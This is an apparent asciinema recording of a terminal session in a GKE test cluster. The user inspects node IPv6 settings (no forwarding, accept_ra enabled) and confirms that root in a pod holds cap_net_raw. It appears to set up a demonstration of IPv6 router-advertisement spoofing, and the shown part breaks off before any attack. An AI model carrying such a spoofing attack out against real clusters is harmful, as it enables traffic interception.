{"version": 2, "width": 158, "height": 55, "timestamp": 1584257053, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.009221, "o", "\u001b[?1049h\u001b[22;0;0t\u001b[?1h\u001b=\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1006l\u001b[?1005l\u001b[c\u001b(B\u001b[m\u001b[?12;25h\u001b[?12l\u001b[?25h\u001b[?1003l\u001b[?1006l\u001b[?2004l\u001b[1;1H\u001b[1;55r\u001b]112\u0007\u001b[1;30H"]
[0.009987, "o", "\u001b[32m\u001b[28;1H────────────────────────────────────────────────────────────────────────────────\u001b[39m──────────────────────────────────────────────────────────────────────────────\u001b[?25l\u001b(B\u001b[m\u001b[1;1H[echampetier@echampetier ~]$ \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[2B[echampetier@echampetier ~]$ \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[0] 0:ipv6*\u001b[39m\u001b[107X\u001b[30m\u001b[107C\"echampetier.lab1.abcd\" 03:24 15-mars-20\u001b(B\u001b[m\u001b[1;30H\u001b[?12l\u001b[?25h\u001b(B\u001b[m\u001b[?12;25h\u001b[?12l\u001b[?25h\u001b[?1003l\u001b[?1006l\u001b[?2004l\u001b[1;1H\u001b[1;55r\u001b[1;30H"]
[0.010149, "o", "\u001b[32m\u001b[28;1H────────────────────────────────────────────────────────────────────────────────\u001b[39m──────────────────────────────────────────────────────────────────────────────\u001b[?25l\u001b(B\u001b[m\u001b[1;1H[echampetier@echampetier ~]$ \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[2B[echampetier@echampetier ~]$ \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[0] 0:ipv6*\u001b[39m\u001b[107X\u001b[30m\u001b[107C\"echampetier.lab1.abcd\" 03:24 15-mars-20\u001b(B\u001b[m\u001b[1;30H\u001b[?12l\u001b[?25h"]
[4.661572, "o", "kubectl get pods -o wide"]
[5.362379, "o", "\r\n"]
[5.946121, "o", "NAME         READY   STATUS    RESTARTS   AGE    IP          NODE                                      NOMINATED NODE   READINESS GATES\r\nubuntu-pod"]
[5.946332, "o", "   1/1     Running   1          6h3m   10.36.2.6   "]
[5.946909, "o", "gke-testipv6-default-pool-e21c8ca6-5kkm   <none>           <none>\r\n"]
[5.953324, "o", "[echampetier@echampetier ~]$ "]
[9.816419, "o", "gcloud compute ssh --zone us-central1-c gke-testipv6-default-pool-e21c8ca6-5kkm"]
[10.480834, "o", "\r\n"]
[12.697687, "o", "\r\nWelcome to Kubernetes v1.16.6-gke.12!\u001b[8;1HYou can find documentation for Kubernetes at:\r\n"]
[12.698435, "o", "  http://docs.kubernetes.io/\u001b[11;1HThe source for this release can be found at:\r\n  /home/kubernetes/kubernetes-src.tar.gz\r\nOr you can download it at:\r\n  https://storage.googleapis.com/kubernetes-release-gke/release/v1.16.6-gke.12/kubernetes-src.tar.gz\u001b[16;1HIt is based on the Kubernetes source at:\r\n  https://github.com/kubernetes/kubernetes/tree/v1.16.6-gke.12\u001b[19;1HFor Kubernetes copyright and licensing information, see:\r\n  /home/kubernetes/LICENSES\u001b[22;1H"]
[12.703792, "o", "\u001b[32m\u001b[1mechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m "]
[17.223252, "o", "ip -6 r"]
[18.090055, "o", "\r\n"]
[18.09163, "o", "::1 dev lo proto kernel metric 256  pref medium\r\nfe80::/64 dev eth0 proto kernel metric 256  pref medium\r\nfe80::/64 dev cbr0 proto kernel metric 256  pref medium\r\nfe80::/64 dev vethc5e27097 proto kernel metric 256  pref medium\r\n"]
[18.09211, "o", "\u001b[1;27r\u001b[2S\u001b[25dfe80::/64 dev veth28cda20f proto kernel metric 256  pref medium\r\nfe80::/64 dev veth0e043293 proto kernel metric 256  pref medium\r\n\u001b[32m\u001b[1mechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m \u001b[1;55r\u001b[27;57H"]
[22.265464, "o", "ip a show c"]
[22.267319, "o", "br0"]
[22.997041, "o", "\u001b[1;27r\u001b[27;1H\n\u001b[1;55r\u001b[27;1H"]
[23.000021, "o", "\u001b[1;27r\u001b[6S\u001b[21d4: cbr0: <BROADCAST,MULTICAST,PROMISC,UP,LOWER_UP> mtu 1460 qdisc htb state UP group default qlen 1000\r\n    link/ether 0e:78:6c:8b:33:2c brd ff:ff:ff:ff:ff:ff\r\n    inet 10.36.2.1/24 scope global cbr0\r\n       valid_lft forever preferred_lft forever\r\n    inet6 fe80::c78:6cff:fe8b:332c/64 scope link \r\n       valid_lft forever preferred_lft forever\u001b[1;55r\u001b[27;1H\u001b[32m\u001b[1mechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m "]
[29.157868, "o", "# we see that the k8s node only has link local IPv6"]
[32.868033, "o", "\u001b[1;27r\u001b[27;1H\n\u001b[32m\u001b[1mechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m \u001b[1;55r\u001b[27;57H"]
[41.24749, "o", "cat /proc/sys/net/ipv6/conf/{"]
[41.251297, "o", "all,cbr0,default}/forwarding"]
[42.071683, "o", "\u001b[1;27r\u001b[27;1H\n\u001b[1;55r\u001b[27;1H"]
[42.072933, "o", "\u001b[1;27r\u001b[3S\u001b[24d0\r\n0\r\n0\r\n\u001b[32m\u001b[1mechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m \u001b[1;55r\u001b[27;57H"]
[47.968613, "o", "cat /proc/sys/ne"]
[47.973001, "o", "t/ipv6/conf/{all,cbr0,default}/accept_ra"]
[48.568925, "o", "\u001b[1;27r\u001b[27;1H\n\u001b[1;55r\u001b[27;1H"]
[48.571172, "o", "\u001b[1;27r\u001b[3S\u001b[24d1\r\n1\r\n1\r\n\u001b[32m\u001b[1mechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m \u001b[1;55r\u001b[27;57H"]
[52.559033, "o", "# no forwarding && acc"]
[52.560187, "o", "ept_ra by defau"]
[52.562508, "o", "lt"]
[53.254993, "o", "\u001b[1;27r\u001b[27;1H\n\u001b[32m\u001b[1mechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m \u001b[1;55r\u001b[27;57H"]
[59.474334, "o", "# let's try to request google"]
[59.476003, "o", ".com"]
[60.017133, "o", "\u001b[?25l\u001b[30m\u001b[42m\u001b[55;1H[0] 0:ipv6*\u001b[39m\u001b[107X\u001b[30m\u001b[107C\"echampetier.lab1.abcd\" 03:25 15-mars-20\u001b(B\u001b[m\u001b[27;90H\u001b[?12l\u001b[?25h"]
[60.397422, "o", "\u001b[1;27r\u001b[27;1H\n\u001b[1;55r\u001b[27;1H"]
[60.398251, "o", "\u001b[32m\u001b[1mechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m "]
[63.890012, "o", "curl www.google.com -v"]
[63.891327, "o", "s 2>&1 | head -"]
[63.892808, "o", "n20"]
[64.575693, "o", "\u001b[1;27r\u001b[27;1H\n\u001b[1;55r\u001b[27;1H"]
[64.583379, "o", "\u001b[1;27r\u001b[2S\u001b[25d*   Trying 172.217.214.106...\r\n* TCP_NODELAY set\u001b[1;55r\u001b[27;1H"]
[64.58446, "o", "\u001b[1;27r\u001b[4S\u001b[23d* Connected to www.google.com (172.217.214.106) port 80 (#0)\r\n> GET / HTTP/1.1\r\n> Host: www.google.com\r\n> User-Agent: curl/7.64.1\u001b[1;55r\u001b[27;1H"]
[64.585533, "o", "\u001b[1;27r\u001b[2S\u001b[25d> Accept: */*\r\n> \u001b[1;55r\u001b[27;1H"]
[64.617718, "o", "\u001b[1;27r\u001b[13S\u001b[14d< HTTP/1.1 200 OK\r\n< Date: Sun, 15 Mar 2020 07:25:17 GMT\r\n< Expires: -1\r\n< Cache-Control: private, max-age=0\r\n< Content-Type: text/html; charset=ISO-8859-1\r\n< P3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\r\n< Server: gws\r\n< X-XSS-Protection: 0\r\n< X-Frame-Options: SAMEORIGIN\r\n< Set-Cookie: 1P_JAR=2020-03-15-07; expires=Tue, 14-Apr-2020 07:25:17 GMT; path=/; domain=.google.com; Secure\r\n< Set-Cookie: NID=200=GyOLRmYQme14kGhZp9rCwSSHX-miJ7wdBTIvuLVPDfNVVAyWJNz5JsTmljW4qMqaKZsenUq6wuIrAqBGuJCXq9OL4-gzzAL_eJLF0S2h8Xv-IDGk-fbhDjXVyhwBBSCGovp3TD35pYErxmCTnK5GuDV9rscIFwreD9sOA6JsDFQ; expires=Mon, 14-Sep-2020 07:25:17 GMT; path=/; domain=.google.com; HttpOnly\r\n< Accept-Ranges: none\r\n\u001b[32m\u001b[1mechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m \u001b[1;55r\u001b[27;57H"]
[71.167893, "o", "# we us"]
[71.169155, "o", "ed IPv4 and got a normal respo"]
[71.171063, "o", "nse"]
[72.624692, "o", "\u001b[1;27r\u001b[27;1H\n\u001b[32m\u001b[1mechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m \u001b[1;55r\u001b[27;57H"]
[78.453684, "o", "\r\n────────────────────────────────────────────────────────────────────────────────\u001b[32m──────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[29;30H"]
[81.741679, "o", "kubectl exec -it ubuntu-pod /bin/bash"]
[82.478059, "o", "\r\n"]
[83.484978, "o", "root@ubuntu-pod:/# "]
[83.487716, "o", "\u001b[28;1H────────────────────────────────────────────────────────────────────────────────\u001b[32m──────────────────────────────────────────────────────────────────────────────\u001b[?25l\u001b(B\u001b[m\u001b[1;1H1\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m # no forwarding && accept_ra by default\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m # let's try to request google.com\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m curl www.google.com -vs 2>&1 | head -n20\u001b[K\r\n*   Trying 172.217.214.106...\u001b[K\r\n* TCP_NODELAY set\u001b[K\r\n* Connected to www.google.com (172.217.214.106) port 80 (#0)\u001b[K\r\n> GET / HTTP/1.1\u001b[K\r\n> Host: www.googl"]
[83.488226, "o", "e.com\u001b[K\r\n> User-Agent: curl/7.64.1\u001b[K\r\n> Accept: */*\u001b[K\r\n> \u001b[K\r\n< HTTP/1.1 200 OK\u001b[K\r\n< Date: Sun, 15 Mar 2020 07:25:17 GMT\u001b[K\r\n< Expires: -1\u001b[K\r\n< Cache-Control: private, max-age=0\u001b[K\r\n< Content-Type: text/html; charset=ISO-8859-1\u001b[K\r\n< P3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\u001b[K\r\n< Server: gws\u001b[K\r\n< X-XSS-Protection: 0\u001b[K\r\n< X-Frame-Options: SAMEORIGIN\u001b[K\r\n< Set-Cookie: 1P_JAR=2020-03-15-07; expires=Tue, 14-Apr-2020 07:25:17 GMT; path=/; domain=.google.com; Secure\u001b[K\r\n< Set-Cookie: NID=200=GyOLRmYQme14kGhZp9rCwSSHX-miJ7wdBTIvuLVPDfNVVAyWJNz5JsTmljW4qMqaKZsenUq6wuIrAqBGuJCXq9OL4-gzzAL_eJLF0S2h8Xv-IDGk-fbhDjXVyhwBBSCGovp3TD35\u001b[24;1HpYErxmCTnK5GuDV9rscIFwreD9sOA6JsDFQ; expires=Mon, 14-Sep-2020 07:25:17 GMT; path=/; domain=.google.com; HttpOnly\u001b[K\r\n< Accept-Ranges: none\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m # we used IPv4 and got a normal response\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m \u001b[K\u001b[29;1H[echam"]
[83.488601, "o", "petier@echampetier ~]$ kubectl exec -it ubuntu-pod /bin/bash\u001b[K\r\nroot@ubuntu-pod:/# \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[0] 0:ipv6*\u001b[39m\u001b[110X\u001b[30m\u001b[110C\"root@ubuntu-pod: /\" 03:25 15-mars-20\u001b(B\u001b[m\u001b[30;20H\u001b[?12l\u001b[?25h"]
[87.451459, "o", "capsh --print"]
[88.013578, "o", "\r\nCurrent: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip\r\nBounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap\r\nSecurebits: 00/0x0/1'b0\r\n secure-noroot: no (unlocked)\r\n secure-no-suid-fixup: no (unlocked)\r\n secure-keep-caps: no (unlocked)\r\nuid=0(root)\r\ngid=0(root)\r\ngroups=\r\nroot@ubuntu-pod:/# "]
[88.014678, "o", "\u001b[28;1H────────────────────────────────────────────────────────────────────────────────\u001b[32m──────────────────────────────────────────────────────────────────────────────\u001b[?25l\u001b(B\u001b[m\u001b[1;1H1\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m # no forwarding && accept_ra by default\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m # let's try to request google.com\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m curl www.google.com -vs 2>&1 | head -n20\u001b[K\r\n*   Trying 172.217.214.106...\u001b[K\r\n* TCP_NODELAY set\u001b[K\r\n* Connected to www.google.com (172.217.214.106) port 80 (#0)\u001b[K\r\n> GET / HTTP/1.1\u001b[K\r\n> Host: www.googl"]
[88.01487, "o", "e.com\u001b[K\r\n> User-Agent: curl/7.64.1\u001b[K\r\n> Accept: */*\u001b[K\r\n> \u001b[K\r\n< HTTP/1.1 200 OK\u001b[K\r\n< Date: Sun, 15 Mar 2020 07:25:17 GMT\u001b[K\r\n< Expires: -1\u001b[K\r\n< Cache-Control: private, max-age=0\u001b[K\r\n< Content-Type: text/html; charset=ISO-8859-1\u001b[K\r\n< P3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\u001b[K\r\n< Server: gws\u001b[K\r\n< X-XSS-Protection: 0\u001b[K\r\n< X-Frame-Options: SAMEORIGIN\u001b[K\r\n< Set-Cookie: 1P_JAR=2020-03-15-07; expires=Tue, 14-Apr-2020 07:25:17 GMT; path=/; domain=.google.com; Secure\u001b[K\r\n< Set-Cookie: NID=200=GyOLRmYQme14kGhZp9rCwSSHX-miJ7wdBTIvuLVPDfNVVAyWJNz5JsTmljW4qMqaKZsenUq6wuIrAqBGuJCXq9OL4-gzzAL_eJLF0S2h8Xv-IDGk-fbhDjXVyhwBBSCGovp3TD35\u001b[24;1HpYErxmCTnK5GuDV9rscIFwreD9sOA6JsDFQ; expires=Mon, 14-Sep-2020 07:25:17 GMT; path=/; domain=.google.com; HttpOnly\u001b[K\r\n< Accept-Ranges: none\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m # we used IPv4 and got a normal response\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m \u001b[K\u001b[29;1H[echam"]
[88.015034, "o", "petier@echampetier ~]$ kubectl exec -it ubuntu-pod /bin/bash\u001b[K\r\nroot@ubuntu-pod:/# capsh --print\u001b[K\r\nCurrent: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mkn\u001b[32;1Hod,cap_audit_write,cap_setfcap+eip\u001b[K\r\nBounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_\u001b[34;1Hmknod,cap_audit_write,cap_setfcap\u001b[K\r\nSecurebits: 00/0x0/1'b0\u001b[K\r\n secure-noroot: no (unlocked)\u001b[K\r\n secure-no-suid-fixup: no (unlocked)\u001b[K\r\n secure-keep-caps: no (unlocked)\u001b[K\r\nuid=0(root)\u001b[K\r\ngid=0(root)\u001b[K\r\ngroups=\u001b[K\r\nroot@ubuntu-pod:/# \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[0] 0:ipv6*\u001b[39m\u001b[110X\u001b[30m\u001b[110C\"root@ubuntu-pod: /\" 03:25 15-mars-20\u001b(B\u001b[m\u001b[42;20H\u001b[?12l\u001b[?25h"]
[92.075833, "o", "# by default root inside the container has the cap_net_raw capability, so we can send receive anything we want"]
[93.822908, "o", "\r\nroot@ubuntu-pod:/# \u001b[K"]
[93.825543, "o", "\u001b[28;1H────────────────────────────────────────────────────────────────────────────────\u001b[32m──────────────────────────────────────────────────────────────────────────────\u001b[?25l\u001b(B\u001b[m\u001b[1;1H1\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m # no forwarding && accept_ra by default\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m # let's try to request google.com\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m curl www.google.com -vs 2>&1 | head -n20\u001b[K\r\n*   Trying 172.217.214.106...\u001b[K\r\n* TCP_NODELAY set\u001b[K\r\n* Connected to www.google.com (172.217.214.106) port 80 (#0)\u001b[K\r\n> GET / HTTP/1.1\u001b[K\r\n> Host: www.googl"]
[93.825972, "o", "e.com\u001b[K\r\n> User-Agent: curl/7.64.1\u001b[K\r\n> Accept: */*\u001b[K\r\n> \u001b[K\r\n< HTTP/1.1 200 OK\u001b[K\r\n< Date: Sun, 15 Mar 2020 07:25:17 GMT\u001b[K\r\n< Expires: -1\u001b[K\r\n< Cache-Control: private, max-age=0\u001b[K\r\n< Content-Type: text/html; charset=ISO-8859-1\u001b[K\r\n< P3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\u001b[K\r\n< Server: gws\u001b[K\r\n< X-XSS-Protection: 0\u001b[K\r\n< X-Frame-Options: SAMEORIGIN\u001b[K\r\n< Set-Cookie: 1P_JAR=2020-03-15-07; expires=Tue, 14-Apr-2020 07:25:17 GMT; path=/; domain=.google.com; Secure\u001b[K\r\n< Set-Cookie: NID=200=GyOLRmYQme14kGhZp9rCwSSHX-miJ7wdBTIvuLVPDfNVVAyWJNz5JsTmljW4qMqaKZsenUq6wuIrAqBGuJCXq9OL4-gzzAL_eJLF0S2h8Xv-IDGk-fbhDjXVyhwBBSCGovp3TD35\u001b[24;1HpYErxmCTnK5GuDV9rscIFwreD9sOA6JsDFQ; expires=Mon, 14-Sep-2020 07:25:17 GMT; path=/; domain=.google.com; HttpOnly\u001b[K\r\n< Accept-Ranges: none\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m # we used IPv4 and got a normal response\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m \u001b[K\u001b[29;1H[echam"]
[93.826297, "o", "petier@echampetier ~]$ kubectl exec -it ubuntu-pod /bin/bash\u001b[K\r\nroot@ubuntu-pod:/# capsh --print\u001b[K\r\nCurrent: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mkn\u001b[32;1Hod,cap_audit_write,cap_setfcap+eip\u001b[K\r\nBounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_\u001b[34;1Hmknod,cap_audit_write,cap_setfcap\u001b[K\r\nSecurebits: 00/0x0/1'b0\u001b[K\r\n secure-noroot: no (unlocked)\u001b[K\r\n secure-no-suid-fixup: no (unlocked)\u001b[K\r\n secure-keep-caps: no (unlocked)\u001b[K\r\nuid=0(root)\u001b[K\r\ngid=0(root)\u001b[K\r\ngroups=\u001b[K\r\nroot@ubuntu-pod:/# # by default root inside the container has the cap_net_raw capability, so we can send receive anything we want\u001b[K\r\nroot@ubuntu-pod:/# \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[0] 0:ipv6*\u001b[39m\u001b[110X\u001b[30m\u001b[110C\"root@ubuntu-pod: /\" 03:25 15-mars-20\u001b(B\u001b[m\u001b[43;20H\u001b[?12l\u001b[?25h"]
[104.148973, "o", "ip a"]
[105.024888, "o", "\r\n"]
[105.033531, "o", "1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\r\n    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\r\n    inet 127.0.0.1/8 scope host lo\r\n       valid_lft forever preferred_lft forever\r\n3: eth0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1460 qdisc noqueue state UP group default \r\n    link/ether ce:4b:f0:c6:c2:14 brd ff:ff:ff:ff:ff:ff link-netnsid 0\r\n    inet 10.36.2.6/24 scope global eth0\r\n       valid_lft forever preferred_lft forever\r\nroot@ubuntu-pod:/# "]
[105.035174, "o", "\u001b[28;1H────────────────────────────────────────────────────────────────────────────────\u001b[32m──────────────────────────────────────────────────────────────────────────────\u001b[?25l\u001b(B\u001b[m\u001b[1;1H1\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m # no forwarding && accept_ra by default\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m # let's try to request google.com\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m curl www.google.com -vs 2>&1 | head -n20\u001b[K\r\n*   Trying 172.217.214.106...\u001b[K\r\n* TCP_NODELAY set\u001b[K\r\n* Connected to www.google.com (172.217.214.106) port 80 (#0)\u001b[K\r\n> GET / HTTP/1.1\u001b[K\r\n> Host: www.googl"]
[105.035296, "o", "e.com\u001b[K\r\n> User-Agent: curl/7.64.1\u001b[K\r\n> Accept: */*\u001b[K\r\n> \u001b[K\r\n< HTTP/1.1 200 OK\u001b[K\r\n< Date: Sun, 15 Mar 2020 07:25:17 GMT\u001b[K\r\n< Expires: -1\u001b[K\r\n< Cache-Control: private, max-age=0\u001b[K\r\n< Content-Type: text/html; charset=ISO-8859-1\u001b[K\r\n< P3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\u001b[K\r\n< Server: gws\u001b[K\r\n< X-XSS-Protection: 0\u001b[K\r\n< X-Frame-Options: SAMEORIGIN\u001b[K\r\n< Set-Cookie: 1P_JAR=2020-03-15-07; expires=Tue, 14-Apr-2020 07:25:17 GMT; path=/; domain=.google.com; Secure\u001b[K\r\n< Set-Cookie: NID=200=GyOLRmYQme14kGhZp9rCwSSHX-miJ7wdBTIvuLVPDfNVVAyWJNz5JsTmljW4qMqaKZsenUq6wuIrAqBGuJCXq9OL4-gzzAL_eJLF0S2h8Xv-IDGk-fbhDjXVyhwBBSCGovp3TD35\u001b[24;1HpYErxmCTnK5GuDV9rscIFwreD9sOA6JsDFQ; expires=Mon, 14-Sep-2020 07:25:17 GMT; path=/; domain=.google.com; HttpOnly\u001b[K\r\n< Accept-Ranges: none\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m # we used IPv4 and got a normal response\u001b[K\u001b[32m\u001b[1m\r\nechampetier@gke-testipv6-default-pool-e21c8ca6-5kkm\u001b[34m ~ $\u001b(B\u001b[m \u001b[K\u001b[29;1H[echam"]
[105.035351, "o", "petier@echampetier ~]$ kubectl exec -it ubuntu-pod /bin/bash\u001b[K\r\nroot@ubuntu-pod:/# capsh --print\u001b[K\r\nCurrent: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mkn\u001b[32;1Hod,cap_audit_write,cap_setfcap+eip\u001b[K\r\nBounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_\u001b[34;1Hmknod,cap_audit_write,cap_setfcap\u001b[K\r\nSecurebits: 00/0x0/1'b0\u001b[K\r\n secure-noroot: no (unlocked)\u001b[K\r\n secure-no-suid-fixup: no (unlocked)\u001b[K\r\n secure-keep-caps: no (unlocked)\u001b[K\r\nuid=0(root)\u001b[K\r\ngid=0(root)\u001b[K\r\ngroups=\u001b[K\r\nroot@ubuntu-pod:/# # by default root inside the container has the cap_net_raw capability, so we can send receive anything we want\u001b[K\r\nroot@ubuntu-pod:/# ip a\u001b[K\r\n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\u001b[K\r\n    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\u001b[K\r\n    inet 12"]
